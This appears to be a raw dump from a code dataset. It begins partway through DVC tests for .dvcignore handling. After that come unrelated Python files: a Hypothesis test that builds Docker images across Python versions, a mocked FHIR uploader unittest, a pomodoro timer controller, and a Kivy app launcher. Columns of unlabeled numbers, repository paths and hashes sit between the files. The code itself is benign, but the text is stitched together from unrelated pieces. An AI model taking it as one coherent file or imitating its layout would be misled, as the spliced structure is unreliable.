def test_multi_ignore_file(tmp_dir, dvc, monkeypatch):
    tmp_dir.gen({"dir": {"subdir": {"should_ignore": "1", "not_ignore": "1"}}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/subdir/*_ignore")
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "!subdir/not_ignore"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / "subdir" / "not_ignore",
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }


def test_pattern_trie_tree(tmp_dir, dvc):
    tmp_dir.gen(
        {
            "top": {
                "first": {
                    DvcIgnore.DVCIGNORE_FILE: "a\nb\nc",
                    "middle": {
                        "second": {
                            DvcIgnore.DVCIGNORE_FILE: "d\ne\nf",
                            "bottom": {},
                        }
                    },
                },
            },
            "other": {DvcIgnore.DVCIGNORE_FILE: "1\n2\n3"},
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore
            break

    assert ignore_pattern_trie is not None
    ignore_pattern_top = ignore_pattern_trie[os.fspath(tmp_dir / "top")]
    ignore_pattern_other = ignore_pattern_trie[os.fspath(tmp_dir / "other")]
    ignore_pattern_first = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first")
    ]
    ignore_pattern_middle = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle")
    ]
    ignore_pattern_second = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second")
    ]
    ignore_pattern_bottom = ignore_pattern_trie[
        os.fspath(tmp_dir / "top" / "first" / "middle" / "second" / "bottom")
    ]

    assert not ignore_pattern_top
    assert (
        DvcIgnorePatterns([], os.fspath(tmp_dir / "top")) == ignore_pattern_top
    )
    assert (
        DvcIgnorePatterns(["1", "2", "3"], os.fspath(tmp_dir / "other"))
        == ignore_pattern_other
    )
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_first
    )
    assert (
        DvcIgnorePatterns(
            ["a", "b", "c"], os.fspath(tmp_dir / "top" / "first")
        )
        == ignore_pattern_middle
    )
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_second
    )
    assert (
        DvcIgnorePatterns(
            [
                "a",
                "b",
                "c",
                "/middle/second/**/d",
                "/middle/second/**/e",
                "/middle/second/**/f",
            ],
            os.fspath(tmp_dir / "top" / "first"),
        )
        == ignore_pattern_bottom
    )


def test_ignore_in_added_dir(tmp_dir, dvc):
    tmp_dir.gen(
        {
            "dir": {
                "sub": {
                    "ignored": {"content": "ignored content"},
                    "not_ignored": "not ignored content",
                }
            },
            ".dvcignore": "**/ignored",
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)

    ignored_path = tmp_dir / "dir" / "sub" / "ignored"
    assert not dvc.tree.exists(PathInfo(ignored_path))
    assert ignored_path.exists()

    dvc.add("dir")
    shutil.rmtree(ignored_path)
    dvc.checkout()

    assert not ignored_path.exists()
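The tests above repeatedly call dvc.tree.__dict__.pop("dvcignore", None) right after rewriting a .dvcignore file. That line appears to invalidate a cached property so the ignore rules are re-read on the next access; a minimal sketch of that idiom, using functools.cached_property (the Tree class here is hypothetical, not DVC's):

from functools import cached_property

class Tree:
    @cached_property
    def dvcignore(self):
        print("re-reading ignore patterns")  # expensive work happens here
        return object()

t = Tree()
_ = t.dvcignore                    # computed once, stored in t.__dict__
_ = t.dvcignore                    # served from the cache, no print
t.__dict__.pop("dvcignore", None)  # drop the cached value
_ = t.dvcignore                    # recomputed, picking up new .dvcignore state

cached_property stores its result under the attribute name in the instance __dict__, which is why popping that key is sufficient to force recomputation.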
31.260204
79
0.5945
1,518
12,254
4.550066
0.128459
0.065151
0.036485
0.027798
0.582597
0.544665
0.491386
0.397568
0.371218
0.345012
0
0.002172
0.248572
12,254
391
80
31.340153
0.747937
0.044557
0
0.350649
0
0
0.133892
0
0
0
0
0
0.107143
1
0.061688
false
0
0.035714
0
0.097403
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41538b4330b560554f0aa682385fd505950bc0e9
1,128
py
Python
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
test_app.py
jeshan/hypothesis-test-python-versions
8bb26275937dc02a2a996aa2c09e9c48a3f87419
[ "BSD-2-Clause" ]
null
null
null
from subprocess import call
from tempfile import NamedTemporaryFile

from hypothesis import settings, note
from hypothesis.stateful import RuleBasedStateMachine, rule
from hypothesis.strategies import sampled_from


def versions():
    """generates only minor versions available on Docker Hub"""
    # TODO: treat as sem-ver version to allow accurate ordering (exercise left to the reader)
    return sampled_from(['3.5', '3.6', '3.7', '3.8'])


class TestPythonVersions(RuleBasedStateMachine):
    @rule(version=versions())
    def try_build_image(self, version):
        with NamedTemporaryFile() as tmp:
            print(f"building in Python version {version} ({tmp.name})")
            contents = f"""FROM python:{version}-alpine
COPY demoapp.py .
RUN python demoapp.py
"""
            tmp.write(contents.encode())
            tmp.flush()
            note(f'Program does not run on Python {version}')
            exit_code = call(f'docker build -f {tmp.name} .'.split(' '))
            assert exit_code == 0


TestPythonVersions.TestCase.settings = settings(deadline=None)
test_python_versions = TestPythonVersions.TestCase
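RuleBasedStateMachine turns each @rule method into a step that Hypothesis mixes into generated action sequences, and the machine's .TestCase attribute is what unittest/pytest actually collects, which is why the module ends by assigning it to a test_* name. A minimal self-contained sketch of the same pattern, with no Docker dependency (the CounterMachine below is illustrative, not from the file above):

from hypothesis import settings
from hypothesis.stateful import RuleBasedStateMachine, invariant, rule
from hypothesis.strategies import integers


class CounterMachine(RuleBasedStateMachine):
    def __init__(self):
        super().__init__()
        self.added = []
        self.total = 0

    @rule(n=integers(min_value=0, max_value=100))
    def add(self, n):
        self.added.append(n)
        self.total += n

    @invariant()
    def total_matches(self):
        # checked after every step Hypothesis takes
        assert self.total == sum(self.added)


# Same export pattern as above: the generated TestCase is what gets run.
CounterTest = CounterMachine.TestCase
CounterTest.settings = settings(max_examples=25, deadline=None)

Disabling the deadline, as the Docker test does, is the usual way to keep slow external steps (image builds, network calls) from being flagged as Hypothesis timing failures.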
33.176471
93
0.696809
139
1,128
5.597122
0.561151
0.053985
0
0
0
0
0
0
0
0
0
0.009956
0.198582
1,128
33
94
34.181818
0.850664
0.126773
0
0
0
0
0.203476
0.023517
0
0
0
0.030303
0.043478
1
0.086957
false
0
0.217391
0
0.391304
0.043478
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
4154f5618899e57ee64e540445a53194c1b762ee
1,479
py
Python
synthea-hiv/uploader/uploader_test.py
GoogleCloudPlatform/openmrs-fhir-analytics
839a5c54e0c81d174522dcb9930b26bc49dfa748
[ "ECL-2.0", "Apache-2.0" ]
39
2020-08-07T18:10:21.000Z
2021-12-24T14:08:36.000Z
synthea-hiv/uploader/uploader_test.py
mozzy11/openmrs-fhir-analytics
796c75f3cc94cfad08e6e4a42d670830e9302d17
[ "Apache-2.0" ]
205
2020-08-20T05:25:29.000Z
2022-02-04T19:20:44.000Z
synthea-hiv/uploader/uploader_test.py
mozzy11/openmrs-fhir-analytics
796c75f3cc94cfad08e6e4a42d670830e9302d17
[ "Apache-2.0" ]
32
2020-08-13T19:14:50.000Z
2022-03-25T04:45:39.000Z
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import unittest
from unittest import mock

import uploader


class UploaderTest(unittest.TestCase):

    def setUp(self):
        super().setUp()
        self.mock_client = mock.MagicMock()
        self.mock_bundle = mock.MagicMock()
        self._upload_resource = mock.patch.object(
            uploader.Uploader, '_upload_resource', return_value='123').start()

    def test_upload_bundle(self):
        self.mock_bundle.openmrs_patient = mock.MagicMock()
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_openmrs_bundle(self.mock_bundle)
        self.assertTrue(self._upload_resource.called)
        self.assertEqual(self.mock_bundle.openmrs_patient.base.new_id, '123')

    def test_upload_bundle_gcp(self):
        self.mock_bundle.patient = None
        upload_handler = uploader.Uploader(self.mock_client)
        upload_handler.upload_bundle(self.mock_bundle)
        self.assertFalse(self._upload_resource.called)
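Note that the setUp above starts a mock.patch.object without ever stopping it, so the patch stays active beyond this TestCase and can leak into other tests in the same run. A common fix is to register the patcher's stop with addCleanup; a sketch assuming nothing about the real uploader module (Service below is a stand-in class):

import unittest
from unittest import mock


class Service:
    def fetch(self):
        return "real"


class ServiceTest(unittest.TestCase):
    def setUp(self):
        super().setUp()
        patcher = mock.patch.object(Service, "fetch", return_value="stubbed")
        self.mock_fetch = patcher.start()
        # undo the patch after each test, even if the test fails
        self.addCleanup(patcher.stop)

    def test_fetch_is_stubbed(self):
        self.assertEqual(Service().fetch(), "stubbed")
        self.assertTrue(self.mock_fetch.called)

addCleanup runs its callbacks in all outcomes (pass, fail, error), which is why it is preferred over pairing start() with a stop() in tearDown.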
35.214286
74
0.76403
206
1,479
5.325243
0.480583
0.065634
0.076572
0.02917
0.20784
0.113036
0.113036
0.113036
0.113036
0.113036
0
0.01112
0.148749
1,479
41
75
36.073171
0.860207
0.370521
0
0.095238
0
0
0.023991
0
0
0
0
0
0.142857
1
0.142857
false
0
0.142857
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4155116ee8c8f0032b20650c9fd29fb3f6faf25b
7,033
py
Python
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
stargazing/pomodoro/pomodoro_controller.py
mtu2/stargazing
8c32728d64e8a7273299ab9d88e814d7a7bb47f2
[ "MIT" ]
null
null
null
from __future__ import annotations

from enum import Enum
from typing import List
import os.path as path

import stargazing.data.database as database
import stargazing.audio.audio_controller as audio_ac
import stargazing.audio.audio_player as audio_ap
import stargazing.pomodoro.timer as pomo_t
import stargazing.project.project_controller as proj_pc
from stargazing.utils.format_funcs import format_pomodoro_time

ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3"
ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3"


class PomodoroIntervalSettings():
    """Interval settings for the pomodoro timer.

    @param work_secs: Number of seconds for the work interval of the timer.
    @param break_secs: Number of seconds for the break interval of the timer."""

    def __init__(self, work_secs: int, break_secs: int) -> None:
        self.work_secs = work_secs
        self.break_secs = break_secs

    @property
    def name(self) -> str:
        return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}"

    def __eq__(self, o: PomodoroIntervalSettings) -> bool:
        return self.work_secs == o.work_secs and self.break_secs == o.break_secs

    def __ne__(self, o: PomodoroIntervalSettings) -> bool:
        return not self.__eq__(o)


class PomodoroStatus(Enum):
    INACTIVE = "inactive"
    WORK = "work"
    BREAK = "break"
    PAUSED_WORK = "paused work"
    PAUSED_BREAK = "paused break"
    FINISHED_WORK = "finished work"
    FINISHED_BREAK = "finished break"


class PomodoroController():
    """Pomodoro manager, containing current pomodoro timer, status,
    autostart option and interval settings.

    @param project_controller: Instance of a project controller.
    @param audio_controller: Instance of an audio controller."""

    def __init__(self, project_controller: proj_pc.ProjectController,
                 audio_controller: audio_ac.AudioController,
                 interval_time: PomodoroIntervalSettings = None,
                 last_autostart=True) -> None:
        self.project_controller = project_controller
        self.audio_controller = audio_controller

        self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings(
            2400, 600)
        self.autostart_setting = last_autostart

        self.timer = pomo_t.Timer(self.interval_settings.work_secs)
        self.status = PomodoroStatus.INACTIVE

    def finish_timer(self, disable_sound=False) -> None:
        if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
            database.insert_pomodoro(
                self.project_controller.current, self.timer)
            self.timer = pomo_t.Timer(self.interval_settings.break_secs)

            if not disable_sound:
                self.__play_alarm_sound(ALARM_FINISH_PATH)

            if self.autostart_setting:
                self.timer.start()
                self.status = PomodoroStatus.BREAK
            else:
                self.status = PomodoroStatus.FINISHED_WORK
        elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK):
            self.timer = pomo_t.Timer(self.interval_settings.work_secs)

            if self.autostart_setting:
                self.timer.start()
                self.status = PomodoroStatus.WORK
                if not disable_sound:
                    self.__play_alarm_sound(ALARM_START_PATH)
            else:
                self.status = PomodoroStatus.FINISHED_BREAK

    def reset_timer(self) -> None:
        if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK,
                           PomodoroStatus.FINISHED_WORK):
            database.insert_pomodoro(
                self.project_controller.current, self.timer)
            self.timer = pomo_t.Timer(self.interval_settings.work_secs)
            self.timer.start()
            self.status = PomodoroStatus.WORK
        elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK,
                             PomodoroStatus.FINISHED_BREAK):
            self.timer = pomo_t.Timer(self.interval_settings.break_secs)
            self.timer.start()
            self.status = PomodoroStatus.BREAK

    def update_timer(self) -> None:
        time_diff, timer_complete = self.timer.update()

        if self.status == PomodoroStatus.WORK:
            self.project_controller.add_todays_total_time(time_diff)
            self.project_controller.current.add_time(time_diff, True)

        if timer_complete:
            self.finish_timer()

    def toggle_start_stop(self) -> None:
        if self.status in (PomodoroStatus.INACTIVE,
                           PomodoroStatus.FINISHED_BREAK):
            self.timer.start()
            self.status = PomodoroStatus.WORK
            self.__play_alarm_sound(ALARM_START_PATH)
        elif self.status == PomodoroStatus.PAUSED_WORK:
            self.timer.continue_()
            self.status = PomodoroStatus.WORK
        elif self.status == PomodoroStatus.FINISHED_WORK:
            self.timer.start()
            self.status = PomodoroStatus.BREAK
        elif self.status == PomodoroStatus.PAUSED_BREAK:
            self.timer.continue_()
            self.status = PomodoroStatus.BREAK
        elif self.status == PomodoroStatus.WORK:
            self.timer.pause()
            self.status = PomodoroStatus.PAUSED_WORK
        elif self.status == PomodoroStatus.BREAK:
            self.timer.pause()
            self.status = PomodoroStatus.PAUSED_BREAK

    def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None:
        self.interval_settings = interval_settings

        # Edit current timer settings without resetting
        if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK,
                           PomodoroStatus.PAUSED_WORK):
            self.timer.interval = interval_settings.work_secs
        else:
            self.timer.interval = interval_settings.break_secs

    def __play_alarm_sound(self, path) -> None:
        curr_vol = self.audio_controller.get_volume()
        audio_decr = 15
        self.audio_controller.set_volume(max(curr_vol - audio_decr, 0))

        alarm = audio_ap.AudioPlayer(path)
        alarm.set_volume(curr_vol)
        alarm.play()

        # TODO: this needs to be async - wait for the alarm length
        self.audio_controller.set_volume(curr_vol)

    @property
    def timer_display(self) -> str:
        if self.status in (PomodoroStatus.INACTIVE,
                           PomodoroStatus.FINISHED_BREAK):
            return "START TIMER"
        elif self.status == PomodoroStatus.WORK:
            return f"BREAK IN {self.timer.remaining_time}"
        elif self.status == PomodoroStatus.BREAK:
            return f"POMODORO IN {self.timer.remaining_time}"
        elif self.status == PomodoroStatus.PAUSED_WORK:
            return f"PAUSED [WORK {self.timer.remaining_time}]"
        elif self.status == PomodoroStatus.PAUSED_BREAK:
            return f"PAUSED [BREAK {self.timer.remaining_time}]"
        elif self.status == PomodoroStatus.FINISHED_WORK:
            return "START BREAK"
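toggle_start_stop drives a small state machine with a long if/elif chain keyed on PomodoroStatus. One behavior-preserving alternative, sketched here on a reduced state set (this is not the project's actual code), is a dict-driven transition table:

from enum import Enum


class Status(Enum):
    INACTIVE = "inactive"
    WORK = "work"
    PAUSED_WORK = "paused work"


# One-step toggle transitions, mirroring the if/elif chain in
# toggle_start_stop for this reduced set of states.
TOGGLE = {
    Status.INACTIVE: Status.WORK,
    Status.WORK: Status.PAUSED_WORK,
    Status.PAUSED_WORK: Status.WORK,
}

status = Status.INACTIVE
status = TOGGLE[status]  # start  -> WORK
status = TOGGLE[status]  # pause  -> PAUSED_WORK
assert status is Status.PAUSED_WORK

The real method also performs side effects (timer.start, pause, continue_, the alarm), so a full table would map each state to a (callback, next_state) pair rather than a bare target state.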
39.072222
113
0.681928
815
7,033
5.640491
0.159509
0.067435
0.125299
0.060909
0.510333
0.415271
0.376115
0.29454
0.258864
0.159887
0
0.002231
0.235177
7,033
179
114
39.290503
0.852389
0.072942
0
0.390625
0
0
0.071473
0.047443
0
0
0
0.005587
0
1
0.09375
false
0
0.078125
0.023438
0.320313
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41567d586e7fa12a33d4c69f999c3c3a2e0316df
1,324
py
Python
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
1
2021-02-20T05:56:49.000Z
2021-02-20T05:56:49.000Z
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
null
null
null
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
1
2021-02-18T05:59:59.000Z
2021-02-18T05:59:59.000Z
from logging import root
from os import name

from kivy.animation import Animation
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.uix.behaviors import button
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.image import Image
from kivy.uix.screenmanager import Screen, ScreenManager
from kivy.uix.button import Button
from kivymd.app import MDApp

from widgets.loader import Loader
from screens.splash import SplashScreen


class MainApp(MDApp):
    def __init__(self, **kwargs):
        self.title = "Virtual Music"
        self.icon = 'assets/icons/app_icon.jpeg'
        super().__init__(**kwargs)

    def build(self):
        self.theme_cls.theme_style = "Dark"
        self.theme_cls.primary_palette = "Purple"
        Clock.schedule_once(self.load_file, 5)
        self.manager = ScreenManager()
        splash_scr = SplashScreen(name="splash")
        self.manager.add_widget(splash_scr)
        self.root = self.manager

    def load_file(self, *args):
        a_pp = Builder.load_file("gui.kv")
        main_scr = Screen(name="main")
        main_scr.add_widget(a_pp)
        self.root.add_widget(main_scr)
        self.root.current = "main"


class Root(BoxLayout):
    pass


if __name__ == "__main__":
    MainApp().run()

""" 0.5,0.1,1,1 """
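Clock.schedule_once(self.load_file, 5) is what keeps the splash screen visible: loading gui.kv is deferred until five seconds after startup, then the main screen is swapped in. A minimal standalone sketch of that scheduling idiom using plain kivy.app.App (DemoApp and its label are hypothetical, not part of the project above):

from kivy.app import App
from kivy.clock import Clock
from kivy.uix.label import Label


class DemoApp(App):
    def build(self):
        self.label = Label(text="waiting...")
        # one-shot callback two seconds after startup; Kivy passes the
        # elapsed time dt to the callback on the main (UI) thread
        Clock.schedule_once(self.update, 2)
        return self.label

    def update(self, dt):
        self.label.text = f"fired after {dt:.1f}s"


if __name__ == "__main__":
    DemoApp().run()

Running deferred work through Clock rather than a background thread keeps widget updates on the UI thread, which Kivy requires.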
25.960784
56
0.701662
184
1,324
4.858696
0.380435
0.080537
0.073826
0
0
0
0
0
0
0
0
0.006579
0.196375
1,324
50
57
26.48
0.833647
0
0
0
0
0
0.058238
0.019923
0
0
0
0
0
1
0.081081
false
0.027027
0.378378
0
0.513514
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2